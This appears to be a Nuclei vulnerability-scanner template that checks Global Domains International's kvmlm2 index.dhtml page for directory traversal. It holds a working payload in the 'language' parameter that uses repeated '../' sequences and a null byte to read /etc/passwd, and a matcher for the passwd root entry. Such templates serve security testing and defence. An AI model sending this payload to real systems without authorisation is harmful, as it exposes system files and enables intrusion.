nuclei-templates/vulnerabilities/other/global-domains-lfi.yaml

26 lines
593 B
YAML

id: global-domains-lfi
info:
name: Global Domains International Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020247
- http://www.nic.ws
tags: globaldomains,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200